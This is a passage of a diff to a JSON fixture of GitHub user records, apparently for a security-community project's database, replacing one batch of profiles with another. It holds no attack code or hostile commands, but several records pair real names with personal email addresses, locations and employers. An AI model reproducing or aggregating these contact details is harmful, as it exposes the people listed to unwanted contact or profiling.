49, + "created_at": "2012-10-07T09:31:20Z", + "updated_at": "2024-08-28T20:13:17Z", + "node_id": "MDQ6VXNlcjI1MDQ4NDA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420778,49 +679952,74 @@ }, { "model": "github.user", - "pk": 2422, + "pk": 7762, "fields": { - "nest_created_at": "2024-09-12T01:25:08.479Z", - "nest_updated_at": "2024-09-12T01:25:29.102Z", - "name": "Ben Verlinden", - "login": "verlindb", - "email": "benverlinden30@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29273350?v=4", - "company": "Ordina Belgium", - "location": "Mechelen, Belgium", + "nest_created_at": "2024-09-22T09:36:32.475Z", + "nest_updated_at": "2024-09-22T19:35:34.956Z", + "name": "", + "login": "k-nguyen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10126593?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-06-08T08:28:29Z", - "updated_at": "2024-06-06T06:54:28Z", - "node_id": "MDQ6VXNlcjI5MjczMzUw", + "public_repositories_count": 2, + "created_at": "2014-12-09T07:59:47Z", + "updated_at": "2021-05-05T06:03:37Z", + "node_id": "MDQ6VXNlcjEwMTI2NTkz", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2423, + "pk": 7763, "fields": { - "nest_created_at": "2024-09-12T01:25:13.067Z", - "nest_updated_at": "2024-09-12T01:25:13.067Z", - "name": "vines", - "login": "vineshub", + "nest_created_at": "2024-09-22T09:36:33.183Z", + "nest_updated_at": "2024-09-22T19:35:35.585Z", + "name": "Vidhan Jain", + "login": "vidhan13j07", + "email": "vidhanj1307@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10212325?v=4", + "company": "", + "location": "Jaipur", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 58, + "public_gists_count": 6, + "public_repositories_count": 34, + "created_at": "2014-12-16T19:10:58Z", + "updated_at": "2022-12-07T09:26:18Z", + "node_id": "MDQ6VXNlcjEwMjEyMzI1", + "bio": "Google Code-in'17 Mentor and GSoC'17 @OSGeo @pgRouting ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7764, + "fields": { + "nest_created_at": "2024-09-22T09:36:33.498Z", + "nest_updated_at": "2024-09-22T19:35:35.903Z", + "name": "", + "login": "zapililirad", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36988708?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/31661822?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-03-02T11:07:01Z", - "updated_at": "2024-04-01T09:51:44Z", - "node_id": "MDQ6VXNlcjM2OTg4NzA4", + "public_repositories_count": 8, + "created_at": "2017-09-05T15:03:18Z", + "updated_at": "2024-08-23T11:12:17Z", + "node_id": "MDQ6VXNlcjMxNjYxODIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420828,49 +680027,49 @@ }, { "model": "github.user", - "pk": 2424, + "pk": 7765, "fields": { - "nest_created_at": "2024-09-12T01:25:13.909Z", - "nest_updated_at": "2024-09-12T01:25:13.909Z", - "name": "", - "login": "aleproscia", + "nest_created_at": "2024-09-22T09:36:33.827Z", + "nest_updated_at": "2024-09-22T19:35:36.230Z", + "name": "Supanat Wangsutthitham", + "login": "SupaJuke", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5622591?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25064349?v=4", "company": "", - "location": "", + "location": "Toronto, Canada", "collaborators_count": 0, "following_count": 2, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2013-10-06T13:17:04Z", - "updated_at": "2024-09-01T09:39:39Z", - "node_id": "MDQ6VXNlcjU2MjI1OTE=", - "bio": "", + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2017-01-11T19:23:46Z", + "updated_at": "2024-09-10T20:43:44Z", + "node_id": "MDQ6VXNlcjI1MDY0MzQ5", + "bio": "University of Toronto CS '23 // A natural born gamer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2425, + "pk": 7766, "fields": { - "nest_created_at": "2024-09-12T01:25:16.943Z", - "nest_updated_at": "2024-09-12T01:25:16.943Z", - "name": "Ibrahim", - "login": "brvheem", + "nest_created_at": "2024-09-22T09:36:34.515Z", + "nest_updated_at": "2024-09-22T19:35:36.875Z", + "name": "mdemarie", + "login": "Demaz93", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29885058?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9434927?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 3, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-07-04T07:37:38Z", - "updated_at": "2022-03-13T08:33:47Z", - "node_id": "MDQ6VXNlcjI5ODg1MDU4", + "public_repositories_count": 6, + "created_at": "2014-10-28T16:04:34Z", + "updated_at": "2024-09-20T19:56:47Z", + "node_id": "MDQ6VXNlcjk0MzQ5Mjc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420878,24 +680077,24 @@ }, { "model": "github.user", - "pk": 2426, + "pk": 7767, "fields": { - "nest_created_at": "2024-09-12T01:25:22.015Z", - "nest_updated_at": "2024-09-12T01:25:22.015Z", - "name": "", - "login": "dmitryoelfimov", + "nest_created_at": "2024-09-22T09:36:34.832Z", + "nest_updated_at": "2024-09-22T19:35:37.185Z", + "name": "Artëm Tsvetkov", + "login": "adeptex", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72246759?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12549639?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-10-02T06:52:39Z", - "updated_at": "2023-01-10T13:56:32Z", - "node_id": "MDQ6VXNlcjcyMjQ2NzU5", + "following_count": 7, + "followers_count": 21, + "public_gists_count": 5, + "public_repositories_count": 28, + "created_at": "2015-05-21T18:46:12Z", + "updated_at": "2024-08-12T17:47:38Z", + "node_id": "MDQ6VXNlcjEyNTQ5NjM5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420903,49 +680102,49 @@ }, { "model": "github.user", - "pk": 2427, + "pk": 7768, "fields": { - "nest_created_at": "2024-09-12T01:25:25.325Z", - "nest_updated_at": "2024-09-12T01:25:25.325Z", - "name": "", - "login": "rsumit", + "nest_created_at": "2024-09-22T09:36:36.085Z", + "nest_updated_at": "2024-09-22T19:35:38.471Z", + "name": "Dimitrios Moidinis", + "login": "madeoninfo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32129881?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/127124?v=4", + "company": "Made On Info", + "location": "Denmark", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-09-20T11:28:03Z", - "updated_at": "2024-07-08T12:48:21Z", - "node_id": "MDQ6VXNlcjMyMTI5ODgx", - "bio": "", + "public_repositories_count": 2, + "created_at": "2009-09-15T06:34:21Z", + "updated_at": "2024-07-29T19:49:36Z", + "node_id": "MDQ6VXNlcjEyNzEyNA==", + "bio": "Experienced IT Manager & Architect", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2428, + "pk": 7769, "fields": { - "nest_created_at": "2024-09-12T01:25:30.410Z", - "nest_updated_at": "2024-09-12T01:25:32.062Z", - "name": "", - "login": "Kiiv", + "nest_created_at": "2024-09-22T09:36:36.400Z", + "nest_updated_at": "2024-09-22T19:35:38.788Z", + "name": "Sascha D.", + "login": "FallenAtticus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/695160?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1499305?v=4", + "company": "idealo internet GmbH", + "location": "Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 21, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2011-03-28T14:02:32Z", - "updated_at": "2024-07-17T17:13:17Z", - "node_id": "MDQ6VXNlcjY5NTE2MA==", + "public_repositories_count": 4, + "created_at": "2012-03-04T12:19:14Z", + "updated_at": "2024-09-12T18:58:08Z", + "node_id": "MDQ6VXNlcjE0OTkzMDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420953,174 +680152,199 @@ }, { "model": "github.user", - "pk": 2429, + "pk": 7770, "fields": { - "nest_created_at": "2024-09-12T01:25:36.754Z", - "nest_updated_at": "2024-09-12T01:25:36.754Z", - "name": "", - "login": "icezhaoL", + "nest_created_at": "2024-09-22T09:36:36.724Z", + "nest_updated_at": "2024-09-22T19:35:39.101Z", + "name": "JP", + "login": "jordanpotti", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14086616?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19959240?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2015-09-02T05:21:12Z", - "updated_at": "2024-07-19T07:10:26Z", - "node_id": "MDQ6VXNlcjE0MDg2NjE2", + "following_count": 10, + "followers_count": 222, + "public_gists_count": 17, + "public_repositories_count": 66, + "created_at": "2016-06-15T19:02:12Z", + "updated_at": "2024-09-10T17:42:16Z", + "node_id": "MDQ6VXNlcjE5OTU5MjQw", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ok_bye_now" } }, { "model": "github.user", - "pk": 2430, + "pk": 7771, "fields": { - "nest_created_at": "2024-09-12T01:25:40.480Z", - "nest_updated_at": "2024-09-16T22:28:27.629Z", - "name": "", - "login": "Valicia", + "nest_created_at": "2024-09-22T09:36:37.043Z", + "nest_updated_at": "2024-09-22T19:38:20.508Z", + "name": "Julien Reitzel", + "login": "Juu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/88562304?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/73843?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-08-06T21:52:54Z", - "updated_at": "2021-08-15T23:28:29Z", - "node_id": "MDQ6VXNlcjg4NTYyMzA0", + "public_repositories_count": 13, + "created_at": "2009-04-14T22:38:42Z", + "updated_at": "2023-07-07T12:20:48Z", + "node_id": "MDQ6VXNlcjczODQz", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2431, + "pk": 7772, "fields": { - "nest_created_at": "2024-09-12T01:25:41.753Z", - "nest_updated_at": "2024-09-12T01:25:41.753Z", - "name": "Dmitry Vershinin", - "login": "keni0k", - "email": "dima-vers0@rambler.ru", - "avatar_url": "https://avatars.githubusercontent.com/u/5165967?v=4", - "company": "", - "location": "Novosibirsk, Russia", + "nest_created_at": "2024-09-22T09:36:37.370Z", + "nest_updated_at": "2024-09-22T19:35:39.738Z", + "name": "SoaAlex", + "login": "SoaAlex", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47610842?v=4", + "company": "@adeo ", + "location": "Lille", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2013-08-05T12:58:49Z", - "updated_at": "2024-01-03T22:59:42Z", - "node_id": "MDQ6VXNlcjUxNjU5Njc=", - "bio": "", + "public_repositories_count": 17, + "created_at": "2019-02-13T19:45:59Z", + "updated_at": "2024-09-06T18:10:45Z", + "node_id": "MDQ6VXNlcjQ3NjEwODQy", + "bio": "Freelance - DevOps Engineer at Adeo - Graduated from CentraleSupelec & ECE Paris -🎂 25", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2432, + "pk": 7773, "fields": { - "nest_created_at": "2024-09-12T01:25:45.520Z", - "nest_updated_at": "2024-09-12T01:25:45.520Z", - "name": "Nilesh Gaikwad", - "login": "Nilesh0101", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31848932?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:36:37.692Z", + "nest_updated_at": "2024-09-22T19:35:40.053Z", + "name": "Shubham Gopale", + "login": "shubhindia", + "email": "shubhindia123@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7694806?v=4", + "company": "@Cisco", + "location": "Sangamner", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 157, + "created_at": "2014-05-25T14:23:28Z", + "updated_at": "2024-09-05T10:31:19Z", + "node_id": "MDQ6VXNlcjc2OTQ4MDY=", + "bio": "Kubernetes, Go, Infrastructure Engineering @cisco. Formerly @gojek, @Ridecell", + "is_hireable": true, + "twitter_username": "shubhindia123" + } +}, +{ + "model": "github.user", + "pk": 7774, + "fields": { + "nest_created_at": "2024-09-22T09:36:38.008Z", + "nest_updated_at": "2024-09-22T19:35:40.381Z", + "name": "Shay van Dam", + "login": "ShayVD", + "email": "shay.vandam96@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/34581180?v=4", + "company": "Edgescan", + "location": "Ireland", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-09-11T10:51:32Z", - "updated_at": "2023-02-09T09:25:17Z", - "node_id": "MDQ6VXNlcjMxODQ4OTMy", - "bio": "", + "public_repositories_count": 5, + "created_at": "2017-12-15T17:31:53Z", + "updated_at": "2024-09-20T08:36:48Z", + "node_id": "MDQ6VXNlcjM0NTgxMTgw", + "bio": "Software Developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2433, + "pk": 7775, "fields": { - "nest_created_at": "2024-09-12T01:25:47.181Z", - "nest_updated_at": "2024-09-12T01:25:47.181Z", - "name": "Maddie Burbage", - "login": "MaddieBurbage", + "nest_created_at": "2024-09-22T09:36:38.372Z", + "nest_updated_at": "2024-09-22T19:35:40.699Z", + "name": "Ricardo Meulendijks", + "login": "ricardomeulendijks", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43120781?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42941224?v=4", "company": "", - "location": "Seattle, Washington", + "location": "Eindhoven", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2018-09-09T22:00:27Z", - "updated_at": "2024-08-09T03:19:39Z", - "node_id": "MDQ6VXNlcjQzMTIwNzgx", - "bio": "UW PhD Student", + "public_repositories_count": 4, + "created_at": "2018-09-03T15:02:57Z", + "updated_at": "2024-08-10T13:31:42Z", + "node_id": "MDQ6VXNlcjQyOTQxMjI0", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2434, + "pk": 7776, "fields": { - "nest_created_at": "2024-09-12T01:25:55.649Z", - "nest_updated_at": "2024-09-16T22:28:28.637Z", - "name": "Davy Durham", - "login": "ddurham2", + "nest_created_at": "2024-09-22T09:36:39.013Z", + "nest_updated_at": "2024-09-22T19:35:41.341Z", + "name": "Nick Cleary", + "login": "nicleary", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4805134?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25833688?v=4", + "company": "Sherwin Williams", + "location": "Cleveland", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 34, - "created_at": "2013-06-24T17:48:05Z", - "updated_at": "2024-09-02T11:24:23Z", - "node_id": "MDQ6VXNlcjQ4MDUxMzQ=", - "bio": "", - "is_hireable": false, + "following_count": 7, + "followers_count": 6, + "public_gists_count": 6, + "public_repositories_count": 32, + "created_at": "2017-02-17T01:19:15Z", + "updated_at": "2024-08-31T03:25:54Z", + "node_id": "MDQ6VXNlcjI1ODMzNjg4", + "bio": "99 Bugs in the code. \r\n99 Bugs in the code. \r\nTake one down, patch it around. \r\n127 Bugs in the code. ", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2435, + "pk": 7777, "fields": { - "nest_created_at": "2024-09-12T01:26:01.207Z", - "nest_updated_at": "2024-09-12T01:26:01.207Z", - "name": "", - "login": "sommersol", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24252783?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:36:39.326Z", + "nest_updated_at": "2024-09-22T19:35:41.657Z", + "name": "Petros Theocharis", + "login": "TheocharisPetros", + "email": "theocharis.petros@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13572082?v=4", + "company": "Netcompany Intrasoft ", + "location": "Athens", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2016-11-29T16:14:05Z", - "updated_at": "2024-04-30T08:37:52Z", - "node_id": "MDQ6VXNlcjI0MjUyNzgz", + "public_repositories_count": 8, + "created_at": "2015-07-30T13:03:04Z", + "updated_at": "2023-10-06T09:45:06Z", + "node_id": "MDQ6VXNlcjEzNTcyMDgy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421128,49 +680352,49 @@ }, { "model": "github.user", - "pk": 2436, + "pk": 7778, "fields": { - "nest_created_at": "2024-09-12T01:26:04.593Z", - "nest_updated_at": "2024-09-12T01:26:04.593Z", - "name": "Alexey Beloglazov", - "login": "beloglazov91", + "nest_created_at": "2024-09-22T09:36:39.761Z", + "nest_updated_at": "2024-09-22T19:35:41.972Z", + "name": "Reinier Vegter", + "login": "reinier-vegter", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1752241?v=4", - "company": "@systemseed ", + "avatar_url": "https://avatars.githubusercontent.com/u/4497866?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 2, "followers_count": 1, - "public_gists_count": 2, - "public_repositories_count": 2, - "created_at": "2012-05-18T12:29:22Z", - "updated_at": "2024-07-20T20:56:17Z", - "node_id": "MDQ6VXNlcjE3NTIyNDE=", - "bio": "Apart from building awesome projects, I like to travel, motorcycles, tasty food, and good drinks.", + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2013-05-22T09:17:37Z", + "updated_at": "2024-06-05T14:50:49Z", + "node_id": "MDQ6VXNlcjQ0OTc4NjY=", + "bio": "security researcher, (web/api) developer, ethical hacker, secure coding instructor", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2437, + "pk": 7779, "fields": { - "nest_created_at": "2024-09-12T01:26:07.492Z", - "nest_updated_at": "2024-09-12T01:33:02.089Z", - "name": "", - "login": "mawl", + "nest_created_at": "2024-09-22T09:36:40.703Z", + "nest_updated_at": "2024-09-22T19:35:42.933Z", + "name": "CanardMandarin", + "login": "CanardMandarin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5493374?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10544393?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2013-09-19T10:23:28Z", - "updated_at": "2024-04-11T09:51:47Z", - "node_id": "MDQ6VXNlcjU0OTMzNzQ=", + "following_count": 9, + "followers_count": 12, + "public_gists_count": 6, + "public_repositories_count": 37, + "created_at": "2015-01-15T08:50:14Z", + "updated_at": "2024-09-21T21:02:33Z", + "node_id": "MDQ6VXNlcjEwNTQ0Mzkz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421178,49 +680402,49 @@ }, { "model": "github.user", - "pk": 2438, + "pk": 7780, "fields": { - "nest_created_at": "2024-09-12T01:26:09.570Z", - "nest_updated_at": "2024-09-12T01:26:09.570Z", - "name": "Artem Smotrakov", - "login": "artem-smotrakov", - "email": "artem.smotrakov@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/19523081?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:36:41.334Z", + "nest_updated_at": "2024-09-22T19:39:53.182Z", + "name": "Vladimir Shelkovnikov", + "login": "C4tWithShell", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/99356504?v=4", + "company": "Soramitsu", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 92, - "public_gists_count": 76, - "public_repositories_count": 64, - "created_at": "2016-05-23T01:32:26Z", - "updated_at": "2024-08-23T11:39:22Z", - "node_id": "MDQ6VXNlcjE5NTIzMDgx", - "bio": "", + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 70, + "created_at": "2022-02-09T18:07:43Z", + "updated_at": "2024-09-05T11:09:39Z", + "node_id": "U_kgDOBewPWA", + "bio": "DevOps at Soramitsu", "is_hireable": false, - "twitter_username": "artem_smotrakov" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2439, + "pk": 7781, "fields": { - "nest_created_at": "2024-09-12T01:26:11.635Z", - "nest_updated_at": "2024-09-12T01:26:11.635Z", - "name": "", - "login": "33yan", + "nest_created_at": "2024-09-22T09:36:41.642Z", + "nest_updated_at": "2024-09-22T19:35:43.863Z", + "name": "Wadeck Follonier", + "login": "Wadeck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14202004?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2662497?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 19, - "followers_count": 5, - "public_gists_count": 2, - "public_repositories_count": 0, - "created_at": "2015-09-09T15:53:47Z", - "updated_at": "2024-07-27T02:47:10Z", - "node_id": "MDQ6VXNlcjE0MjAyMDA0", + "following_count": 4, + "followers_count": 19, + "public_gists_count": 3, + "public_repositories_count": 129, + "created_at": "2012-10-27T08:01:54Z", + "updated_at": "2024-05-20T19:11:47Z", + "node_id": "MDQ6VXNlcjI2NjI0OTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421228,49 +680452,49 @@ }, { "model": "github.user", - "pk": 2440, + "pk": 7782, "fields": { - "nest_created_at": "2024-09-12T01:26:13.285Z", - "nest_updated_at": "2024-09-12T01:26:13.285Z", - "name": "Mohamed Harrouni", - "login": "AL1010237", + "nest_created_at": "2024-09-22T09:36:41.954Z", + "nest_updated_at": "2024-09-22T19:35:44.175Z", + "name": "Cao Wei", + "login": "swaggycorgi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83699002?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/35055032?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-05-05T09:14:13Z", - "updated_at": "2023-06-27T12:39:18Z", - "node_id": "MDQ6VXNlcjgzNjk5MDAy", - "bio": "", + "public_repositories_count": 4, + "created_at": "2018-01-03T04:53:21Z", + "updated_at": "2018-05-25T07:38:52Z", + "node_id": "MDQ6VXNlcjM1MDU1MDMy", + "bio": "Application Security Intern", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2441, + "pk": 7783, "fields": { - "nest_created_at": "2024-09-12T01:26:14.510Z", - "nest_updated_at": "2024-09-12T01:26:14.510Z", - "name": "Daniel Ferreira", - "login": "daniel-anova", + "nest_created_at": "2024-09-22T09:36:42.273Z", + "nest_updated_at": "2024-09-22T19:35:44.488Z", + "name": "", + "login": "axelpavageau", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71904581?v=4", - "company": "ANOVA", + "avatar_url": "https://avatars.githubusercontent.com/u/8265419?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 2, - "public_repositories_count": 13, - "created_at": "2020-09-25T20:45:30Z", - "updated_at": "2024-07-10T23:24:31Z", - "node_id": "MDQ6VXNlcjcxOTA0NTgx", + "followers_count": 6, + "public_gists_count": 3, + "public_repositories_count": 4, + "created_at": "2014-07-25T08:09:06Z", + "updated_at": "2024-09-02T20:50:33Z", + "node_id": "MDQ6VXNlcjgyNjU0MTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421278,49 +680502,49 @@ }, { "model": "github.user", - "pk": 2442, + "pk": 7784, "fields": { - "nest_created_at": "2024-09-12T01:26:17.490Z", - "nest_updated_at": "2024-09-12T01:42:19.002Z", - "name": "Kévin PEREZ", - "login": "Whisper40", + "nest_created_at": "2024-09-22T09:36:42.672Z", + "nest_updated_at": "2024-09-22T19:35:44.809Z", + "name": "", + "login": "bend18", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30440458?v=4", - "company": "CAGIP", - "location": "Montpellier, France", + "avatar_url": "https://avatars.githubusercontent.com/u/44141322?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 31, - "created_at": "2017-07-25T15:10:39Z", - "updated_at": "2024-08-11T11:39:23Z", - "node_id": "MDQ6VXNlcjMwNDQwNDU4", - "bio": "DevOps Engineer at CAGIP", + "public_repositories_count": 1, + "created_at": "2018-10-14T16:21:18Z", + "updated_at": "2019-01-09T01:43:25Z", + "node_id": "MDQ6VXNlcjQ0MTQxMzIy", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2443, + "pk": 7785, "fields": { - "nest_created_at": "2024-09-12T01:26:18.764Z", - "nest_updated_at": "2024-09-12T01:27:01.396Z", - "name": "Matthias Schiebel", - "login": "CompartMSL", + "nest_created_at": "2024-09-22T09:36:42.997Z", + "nest_updated_at": "2024-09-22T19:35:45.124Z", + "name": "", + "login": "bjhijmans", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39903234?v=4", - "company": "Compart AG", + "avatar_url": "https://avatars.githubusercontent.com/u/59833909?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2018-06-04T08:48:28Z", - "updated_at": "2024-07-11T09:57:59Z", - "node_id": "MDQ6VXNlcjM5OTAzMjM0", + "public_repositories_count": 10, + "created_at": "2020-01-13T14:26:11Z", + "updated_at": "2024-06-26T09:30:12Z", + "node_id": "MDQ6VXNlcjU5ODMzOTA5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421328,49 +680552,49 @@ }, { "model": "github.user", - "pk": 2444, + "pk": 7786, "fields": { - "nest_created_at": "2024-09-12T01:26:20.532Z", - "nest_updated_at": "2024-09-12T01:26:23.488Z", - "name": "Paul Hammant", - "login": "paul-hammant", - "email": "paul@hammant.org", - "avatar_url": "https://avatars.githubusercontent.com/u/82182?v=4", - "company": "Paul Hammant Delivery Optimization", - "location": "Edinburgh", + "nest_created_at": "2024-09-22T09:36:43.944Z", + "nest_updated_at": "2024-09-22T19:35:46.091Z", + "name": "Jacob", + "login": "squ1rr3lly", + "email": "jacob.magdziarz@coalfire.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6751032?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 484, - "public_gists_count": 21, - "public_repositories_count": 282, - "created_at": "2009-05-07T20:05:09Z", - "updated_at": "2024-04-19T18:02:04Z", - "node_id": "MDQ6VXNlcjgyMTgy", - "bio": "Startup CTO, Trunk-Based Development expert, ex ThoughtWorker", + "following_count": 4, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 38, + "created_at": "2014-02-21T19:20:37Z", + "updated_at": "2024-09-06T21:42:43Z", + "node_id": "MDQ6VXNlcjY3NTEwMzI=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2445, + "pk": 7787, "fields": { - "nest_created_at": "2024-09-12T01:26:22.202Z", - "nest_updated_at": "2024-09-12T01:26:22.202Z", - "name": "nathan roy", - "login": "dormine", - "email": "solal.roy@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/23026612?v=4", + "nest_created_at": "2024-09-22T09:36:44.271Z", + "nest_updated_at": "2024-09-22T19:35:46.406Z", + "name": "", + "login": "qlimenoque", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49155800?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2016-10-24T08:17:06Z", - "updated_at": "2023-08-23T15:14:48Z", - "node_id": "MDQ6VXNlcjIzMDI2NjEy", + "public_repositories_count": 13, + "created_at": "2019-04-01T12:44:29Z", + "updated_at": "2024-06-12T09:18:24Z", + "node_id": "MDQ6VXNlcjQ5MTU1ODAw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421378,24 +680602,24 @@ }, { "model": "github.user", - "pk": 2446, + "pk": 7788, "fields": { - "nest_created_at": "2024-09-12T01:26:26.851Z", - "nest_updated_at": "2024-09-12T01:26:26.851Z", + "nest_created_at": "2024-09-22T09:36:44.912Z", + "nest_updated_at": "2024-09-22T19:35:47.044Z", "name": "", - "login": "poteddy", + "login": "renejal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/95437799?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/40049733?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - 